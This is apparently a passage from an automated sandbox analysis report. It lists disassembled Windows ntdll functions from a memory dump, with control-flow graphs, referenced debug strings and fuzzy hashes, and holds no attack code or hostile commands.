                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                                                                                                                                • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                                                                                                                                                • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                Function 326FA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 389 326fa1f0-326fa269 call 32632330 * 2 RtlDebugPrintTimes 395 326fa41f-326fa444 call 326324d0 * 2 call 32664b50 389->395 396 326fa26f-326fa27a 389->396 398 326fa27c-326fa289 396->398 399 326fa2a4 396->399 401 326fa28f-326fa295 398->401 402 326fa28b-326fa28d 398->402 403 326fa2a8-326fa2b4 399->403 405 326fa29b-326fa2a2 401->405 406 326fa373-326fa375 401->406 402->401 407 326fa2c1-326fa2c3 403->407 405->403 409 326fa39f-326fa3a1 406->409 410 326fa2b6-326fa2bc 407->410 411 326fa2c5-326fa2c7 407->411 412 326fa3a7-326fa3b4 409->412 413 326fa2d5-326fa2fd RtlDebugPrintTimes 409->413 415 326fa2be 410->415 416 326fa2cc-326fa2d0 410->416 411->409 417 326fa3da-326fa3e6 412->417 418 326fa3b6-326fa3c3 412->418 413->395 425 326fa303-326fa320 RtlDebugPrintTimes 413->425 415->407 420 326fa3ec-326fa3ee 416->420 424 326fa3fb-326fa3fd 417->424 422 326fa3cb-326fa3d1 418->422 423 326fa3c5-326fa3c9 418->423 420->409 426 326fa4eb-326fa4ed 422->426 427 326fa3d7 422->427 423->422 428 326fa3ff-326fa401 424->428 429 326fa3f0-326fa3f6 424->429 425->395 437 326fa326-326fa34c RtlDebugPrintTimes 425->437 430 326fa403-326fa409 426->430 427->417 428->430 431 326fa3f8 429->431 432 326fa447-326fa44b 429->432 435 326fa40b-326fa41d RtlDebugPrintTimes 430->435 436 326fa450-326fa474 RtlDebugPrintTimes 430->436 431->424 434 326fa51f-326fa521 432->434 435->395 436->395 441 326fa476-326fa493 RtlDebugPrintTimes 436->441 437->395 442 326fa352-326fa354 437->442 441->395 446 326fa495-326fa4c4 RtlDebugPrintTimes 441->446 443 326fa377-326fa38a 442->443 444 326fa356-326fa363 442->444 449 326fa397-326fa399 443->449 447 326fa36b-326fa371 444->447 448 326fa365-326fa369 444->448 446->395 455 326fa4ca-326fa4cc 446->455 447->406 447->443 448->447 450 326fa38c-326fa392 449->450 451 326fa39b-326fa39d 449->451 453 326fa3e8-326fa3ea 450->453 454 326fa394 450->454 451->409 453->420 454->449 456 326fa4ce-326fa4db 455->456 457 326fa4f2-326fa505 455->457 458 326fa4dd-326fa4e1 456->458 459 326fa4e3-326fa4e9 456->459 460 326fa512-326fa514 457->460 458->459 459->426 459->457 461 326fa507-326fa50d 460->461 462 326fa516 460->462 463 326fa50f 461->463 464 326fa51b-326fa51d 461->464 462->428 463->460 464->434
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: HEAP:
                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                • Opcode ID: 9d68a09e4ff3a585f8043d404a997daed76b34be05051022c6fc13455bb92f1f
                                                                                                                                                • Instruction ID: 2de1b2927f577550710da757a9908d1fd8e22c414ec141c93302a728168e93b5
                                                                                                                                                • Opcode Fuzzy Hash: 9d68a09e4ff3a585f8043d404a997daed76b34be05051022c6fc13455bb92f1f
                                                                                                                                                • Instruction Fuzzy Hash: 6CA1DF766043119FDB09CF18C894A2AB7E5FF88B54F14452DE946DB350EB32EC46CB91
                                                                                                                                                Function 3263A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 886 3263a170-3263a18f 887 3263a195-3263a1b1 886->887 888 3263a4ad-3263a4b4 886->888 890 3263a1b7-3263a1c0 887->890 891 326877f3-326877f8 887->891 888->887 889 3263a4ba-326877c8 888->889 889->887 896 326877ce-326877d3 889->896 890->891 893 3263a1c6-3263a1cc 890->893 894 3263a1d2-3263a1d4 893->894 895 3263a5da-3263a5dc 893->895 894->891 897 3263a1da-3263a1dd 894->897 895->897 898 3263a5e2 895->898 899 3263a393-3263a399 896->899 897->891 900 3263a1e3-3263a1e6 897->900 898->900 901 3263a1fa-3263a1fd 900->901 902 3263a1e8-3263a1f1 900->902 905 3263a203-3263a24b 901->905 906 3263a5e7-3263a5f0 901->906 903 326877d8-326877e2 902->903 904 3263a1f7 902->904 907 326877e7-326877f0 call 326aef10 903->907 904->901 908 3263a250-3263a255 905->908 906->905 909 3263a5f6-3268780c 906->909 907->891 911 3263a25b-3263a263 908->911 912 3263a39c-3263a39f 908->912 909->907 915 3263a265-3263a269 911->915 916 3263a26f-3263a27d 911->916 912->916 917 3263a3a5-3263a3a8 912->917 915->916 918 3263a4bf-3263a4c8 915->918 919 3263a283-3263a288 916->919 920 3263a3ae-3263a3be 916->920 917->920 921 32687823-32687826 917->921 922 3263a4e0-3263a4e3 918->922 923 3263a4ca-3263a4cc 918->923 924 3263a28c-3263a28e 919->924 920->921 926 3263a3c4-3263a3cd 920->926 921->924 925 3268782c-32687831 921->925 928 3268780e 922->928 929 3263a4e9-3263a4ec 922->929 923->916 927 3263a4d2-3263a4db 923->927 930 3263a294-3263a2ac call 3263a600 924->930 931 32687833 924->931 932 32687838 925->932 926->924 927->924 933 32687819 928->933 929->933 934 3263a4f2-3263a4f5 929->934 939 3263a3d2-3263a3d9 930->939 940 3263a2b2-3263a2da 930->940 931->932 936 3268783a-3268783c 932->936 933->921 934->923 936->899 938 32687842 936->938 941 3263a2dc-3263a2de 939->941 942 3263a3df-3263a3e2 939->942 940->941 941->936 944 3263a2e4-3263a2eb 941->944 942->941 943 3263a3e8-3263a3f3 942->943 943->908 945 3263a2f1-3263a2f4 944->945 946 326878ed 944->946 948 3263a300-3263a30a 945->948 947 326878f1-32687909 call 326aef10 946->947 947->899 948->947 950 3263a310-3263a32c call 3263a760 948->950 954 3263a332-3263a337 950->954 955 3263a4f7-3263a500 950->955 954->899 956 3263a339-3263a35d 954->956 957 3263a502-3263a50b 955->957 958 3263a521-3263a523 955->958 959 3263a360-3263a363 956->959 957->958 960 3263a50d-3263a511 957->960 961 3263a525-3263a543 call 32624428 958->961 962 3263a549-3263a551 958->962 963 3263a369-3263a36c 959->963 964 3263a3f8-3263a3fc 959->964 965 3263a5a1-3263a5cb RtlDebugPrintTimes 960->965 966 3263a517-3263a51b 960->966 961->899 961->962 970 3263a372-3263a374 963->970 971 326878e3 963->971 968 3263a402-3263a405 964->968 969 32687847-3268784f 964->969 965->958 985 3263a5d1-3263a5d5 965->985 966->958 966->965 973 3263a554-3263a56a 968->973 975 3263a40b-3263a40e 968->975 969->973 974 32687855-32687859 969->974 976 3263a440-3263a459 call 3263a600 970->976 977 3263a37a-3263a381 970->977 971->946 979 3263a570-3263a579 973->979 980 3263a414-3263a42c 973->980 974->973 981 3268785f-32687868 974->981 975->963 975->980 995 3263a45f-3263a487 976->995 996 3263a57e-3263a585 976->996 983 3263a387-3263a38c 977->983 984 3263a49b-3263a4a2 977->984 979->970 980->963 988 3263a432-3263a43b 980->988 986 3268786a-3268786d 981->986 987 32687892-32687894 981->987 983->899 990 3263a38e 983->990 984->948 991 3263a4a8 984->991 985->958 992 3268787b-3268787e 986->992 993 3268786f-32687879 986->993 987->973 994 3268789a-326878a3 987->994 988->970 990->899 991->946 1000 3268788b 992->1000 1001 32687880-32687889 992->1001 999 3268788e 993->999 994->970 998 3263a489-3263a48b 995->998 997 3263a58b-3263a58e 996->997 996->998 997->998 1002 3263a594-3263a59c 997->1002 998->983 1003 3263a491-3263a493 998->1003 999->987 1000->999 1001->994 1002->959 1004 326878a8-326878b1 1003->1004 1005 3263a499 1003->1005 1004->1005 1006 326878b7-326878bd 1004->1006 1005->984 1006->1005 1007 326878c3-326878cb 1006->1007 1007->1005 1008 326878d1-326878dc 1007->1008 1008->1007 1009 326878de 1008->1009 1009->1005
                                                                                                                                                Strings
                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 326877DD, 32687802
                                                                                                                                                • SsHd, xrefs: 3263A304
                                                                                                                                                • Actx , xrefs: 32687819, 32687880
                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32687807
                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326877E2
                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 326878F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                • Opcode ID: 4d52a8881563b2c103c8e5976723822cde1ef548000e76257b971bb95e473df0
                                                                                                                                                • Instruction ID: be9460afd48e3d90c4c8ee3f931be87b72da751200e9037f023ca10adcbc942c
                                                                                                                                                • Opcode Fuzzy Hash: 4d52a8881563b2c103c8e5976723822cde1ef548000e76257b971bb95e473df0
                                                                                                                                                • Instruction Fuzzy Hash: A9E1F4B96053018FE70ACE24CC9075A77E1BF85368F500A2DEE65CB2A1DB31DC45DB82
                                                                                                                                                Function 3263D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1010 3263d690-3263d6cb 1011 3263d6d1-3263d6db 1010->1011 1012 3263d907-3263d90e 1010->1012 1014 3263d6e1-3263d6ea 1011->1014 1015 32689164 1011->1015 1012->1011 1013 3263d914-32689139 1012->1013 1013->1011 1020 3268913f-32689144 1013->1020 1014->1015 1016 3263d6f0-3263d6f3 1014->1016 1021 3268916e-3268917d 1015->1021 1018 3263d8fa-3263d8fc 1016->1018 1019 3263d6f9-3263d6fb 1016->1019 1022 3263d701-3263d704 1018->1022 1024 3263d902 1018->1024 1019->1015 1019->1022 1023 3263d847-3263d858 call 32664b50 1020->1023 1025 32689158-32689161 call 326aef10 1021->1025 1022->1015 1026 3263d70a-3263d70d 1022->1026 1024->1026 1025->1015 1029 3263d713-3263d716 1026->1029 1030 3263d919-3263d922 1026->1030 1033 3263d92d-3263d936 1029->1033 1034 3263d71c-3263d768 call 3263d580 1029->1034 1030->1029 1035 3263d928-32689153 1030->1035 1033->1034 1038 3263d93c 1033->1038 1034->1023 1040 3263d76e-3263d772 1034->1040 1035->1025 1038->1021 1040->1023 1041 3263d778-3263d77f 1040->1041 1042 3263d8f1-3263d8f5 1041->1042 1043 3263d785-3263d789 1041->1043 1044 32689370-32689388 call 326aef10 1042->1044 1045 3263d790-3263d79a 1043->1045 1044->1023 1045->1044 1046 3263d7a0-3263d7a7 1045->1046 1049 3263d7a9-3263d7ad 1046->1049 1050 3263d80d-3263d82d 1046->1050 1052 3263d7b3-3263d7b8 1049->1052 1053 3268917f 1049->1053 1051 3263d830-3263d833 1050->1051 1054 3263d835-3263d838 1051->1054 1055 3263d85b-3263d860 1051->1055 1056 3263d7be-3263d7c5 1052->1056 1057 32689186-32689188 1052->1057 1053->1057 1060 3263d83e-3263d840 1054->1060 1061 32689366-3268936b 1054->1061 1062 3263d866-3263d869 1055->1062 1063 326892e0-326892e8 1055->1063 1058 3263d7cb-3263d803 call 32668170 1056->1058 1059 326891f7-326891fa 1056->1059 1057->1056 1064 3268918e-326891b7 1057->1064 1084 3263d805-3263d807 1058->1084 1066 326891fe-3268920d call 32678050 1059->1066 1067 3263d842 1060->1067 1068 3263d891-3263d8ac call 3263a600 1060->1068 1061->1023 1069 3263d941-3263d94f 1062->1069 1070 3263d86f-3263d872 1062->1070 1063->1069 1071 326892ee-326892f2 1063->1071 1064->1050 1072 326891bd-326891d7 call 32678050 1064->1072 1094 3268920f-3268921d 1066->1094 1095 32689224 1066->1095 1067->1023 1091 3263d8b2-3263d8da 1068->1091 1092 32689335-3268933a 1068->1092 1074 3263d955-3263d95e 1069->1074 1075 3263d874-3263d884 1069->1075 1070->1054 1070->1075 1071->1069 1079 326892f8-32689301 1071->1079 1072->1084 1089 326891dd-326891f0 1072->1089 1074->1060 1075->1054 1080 3263d886-3263d88f 1075->1080 1081 3268931f-32689321 1079->1081 1082 32689303-32689306 1079->1082 1080->1060 1081->1069 1093 32689327-32689330 1081->1093 1087 32689308-3268930e 1082->1087 1088 32689310-32689313 1082->1088 1084->1050 1090 3268922d-32689231 1084->1090 1087->1081 1096 3268931c 1088->1096 1097 32689315-3268931a 1088->1097 1089->1072 1098 326891f2 1089->1098 1090->1050 1102 32689237-3268923d 1090->1102 1099 3263d8dc-3263d8de 1091->1099 1092->1099 1100 32689340-32689343 1092->1100 1093->1060 1094->1066 1101 3268921f 1094->1101 1095->1090 1096->1081 1097->1093 1098->1050 1103 3263d8e4-3263d8eb 1099->1103 1104 32689356-3268935b 1099->1104 1100->1099 1105 32689349-32689351 1100->1105 1101->1050 1106 3268923f-3268925c 1102->1106 1107 32689264-3268926d 1102->1107 1103->1042 1103->1045 1104->1023 1110 32689361 1104->1110 1105->1051 1106->1107 1111 3268925e-32689261 1106->1111 1108 3268926f-32689274 1107->1108 1109 326892b4-326892b6 1107->1109 1108->1109 1112 32689276-3268927a 1108->1112 1113 326892b8-326892d3 call 32624428 1109->1113 1114 326892d9-326892db 1109->1114 1110->1061 1111->1107 1115 3268927c-32689280 1112->1115 1116 32689282-326892ae RtlDebugPrintTimes 1112->1116 1113->1023 1113->1114 1114->1023 1115->1109 1115->1116 1116->1109 1120 326892b0 1116->1120 1120->1109
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 3268914E, 32689173
                                                                                                                                                • Actx , xrefs: 32689315
                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32689178
                                                                                                                                                • GsHd, xrefs: 3263D794
                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32689153
                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32689372
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                • Opcode ID: d2194278d195ca2bd72ca7907d32e57173fae04ca228255302a12a752a4e0edb
                                                                                                                                                • Instruction ID: 83030e7352c2dcf1e9f5d7bdee664ee4865daee07e6407ef652e35afd91cf20d
                                                                                                                                                • Opcode Fuzzy Hash: d2194278d195ca2bd72ca7907d32e57173fae04ca228255302a12a752a4e0edb
                                                                                                                                                • Instruction Fuzzy Hash: 44E1A07460A341DFE705CF24C880B5AB7F4BF88758F404A6DEA958B392DB71E944CB92
                                                                                                                                                Function 3269FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1172 3269fa02-3269fa3a call 3269f899 1175 3269fa7a-3269fa7c 1172->1175 1176 3269fa3c-3269fa40 1172->1176 1179 3269fa7f-3269fa81 1175->1179 1180 3269fa7e 1175->1180 1177 3269fa42 1176->1177 1178 3269fa47-3269fa77 call 3269e692 1176->1178 1177->1178 1178->1175 1182 3269fa99 1179->1182 1183 3269fa83-3269fa8d 1179->1183 1180->1179 1184 3269fa9b 1182->1184 1183->1184 1185 3269fa8f-3269fa93 1183->1185 1188 3269fa9d-3269faa2 1184->1188 1185->1184 1187 3269fa95-3269fa97 1185->1187 1187->1188 1189 3269fb01-3269fb06 1188->1189 1190 3269faa4-3269faa6 1188->1190 1192 3269fb08-3269fb0a 1189->1192 1193 3269fb1f-3269fb25 1189->1193 1190->1189 1191 3269faa8-3269fad4 call 32656010 1190->1191 1199 3269fae2-3269fae8 1191->1199 1200 3269fad6-3269fae0 1191->1200 1194 3269fb0c 1192->1194 1195 3269fb0f-3269fb1d RtlDebugPrintTimes 1192->1195 1194->1195 1195->1193 1201 3269faeb-3269faff RtlDebugPrintTimes 1199->1201 1200->1201 1201->1189 1201->1193
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                • Opcode ID: 86c869d05e28b936398fbd926cda4bee7ac83dff17fcc667536ad6550a32b705
                                                                                                                                                • Instruction ID: 366df79d890aff639c44dafdd87aedfed63f0aa3cc915f9a55947199d24102d2
                                                                                                                                                • Opcode Fuzzy Hash: 86c869d05e28b936398fbd926cda4bee7ac83dff17fcc667536ad6550a32b705
                                                                                                                                                • Instruction Fuzzy Hash: 7D416BB9A01209EBDB05CF98C980AEEBBB9FF48754F114169ED04B7350DB71AE41DB90
                                                                                                                                                Function 32616565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32679885
                                                                                                                                                • LdrpLoadShimEngine, xrefs: 3267984A, 3267988B
                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 32679854, 32679895
                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32679843
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                • Opcode ID: d74998dacf3a797b8269fec84aa9bc4d9e246f1a5ee7c7c7f1aed1e0281a52e1
                                                                                                                                                • Instruction ID: bf3d358e2d8612487a0c6e337366419b4b52cb9630d0a8d4775582e1ef36f8d2
                                                                                                                                                • Opcode Fuzzy Hash: d74998dacf3a797b8269fec84aa9bc4d9e246f1a5ee7c7c7f1aed1e0281a52e1
                                                                                                                                                • Instruction Fuzzy Hash: 0A51017AA013549FEB08DBA8C894F9D77A6BF48314F140569E541BF295CBB0BC82CB85
                                                                                                                                                Function 3264DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                • Opcode ID: 0e8ccd439ad5c2389fd509a5b8302031d20fe797e382d753bc188e459efc1cd6
                                                                                                                                                • Instruction ID: e302e87d16dbf4cca1c004be7e6fa3bd4c19eb378a04b6f268cd27b4f8aaeb8b
                                                                                                                                                • Opcode Fuzzy Hash: 0e8ccd439ad5c2389fd509a5b8302031d20fe797e382d753bc188e459efc1cd6
                                                                                                                                                • Instruction Fuzzy Hash: 2C3159B5601784EFF726CB24C408F8977ECEF057A8F050885E88157A92CFB5FA81CA56
                                                                                                                                                Function 3264EE48 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 347COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: d2
                                                                                                                                                • API String ID: 0-2767080420
                                                                                                                                                • Opcode ID: f01999b3b8870623831126305ba72d397790146b415d5d269e4fa34df62aa9bc
                                                                                                                                                • Instruction ID: 9ecfb59ff309f9107055f6960a2a263bc20a6cc8d0e0d4d0549f66aa3884216b
                                                                                                                                                • Opcode Fuzzy Hash: f01999b3b8870623831126305ba72d397790146b415d5d269e4fa34df62aa9bc
                                                                                                                                                • Instruction Fuzzy Hash: CBE10275D00708DFDB25CFA9C980A9DBBF9FF48314F20452AE986A7660DB71A881CF51
                                                                                                                                                Function 32629046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $$@
                                                                                                                                                • API String ID: 3446177414-1194432280
                                                                                                                                                • Opcode ID: e47e98aae6dc31b981b5b54d974e101d35f32fd56bb7bbafc44d7616afcfa7eb
                                                                                                                                                • Instruction ID: a81369a9c0fadf5f775d6f5c7daf261313afac7f318e474f49579c8be739ebf1
                                                                                                                                                • Opcode Fuzzy Hash: e47e98aae6dc31b981b5b54d974e101d35f32fd56bb7bbafc44d7616afcfa7eb
                                                                                                                                                • Instruction Fuzzy Hash: 9F816D71D012699BDB25CF54CC40BDEB7B8AF48704F0041EAEA0AB7250DB709E85CFA5
                                                                                                                                                Function 3261F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                • Opcode ID: 72abecfd70a12a063ec64da3614bd044aaa483ca9c9e99a5fe913a60178ce35e
                                                                                                                                                • Instruction ID: e02f9d1528985a8ad8a6da77b77d1445d188e5353532aed64ca020f972388f14
                                                                                                                                                • Opcode Fuzzy Hash: 72abecfd70a12a063ec64da3614bd044aaa483ca9c9e99a5fe913a60178ce35e
                                                                                                                                                • Instruction Fuzzy Hash: E49103B1205751EFE31ADF28C880B2EB7A9BF84744F040959E9409B296DF78F845CBD6
                                                                                                                                                Function 326258E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 0-2766056989
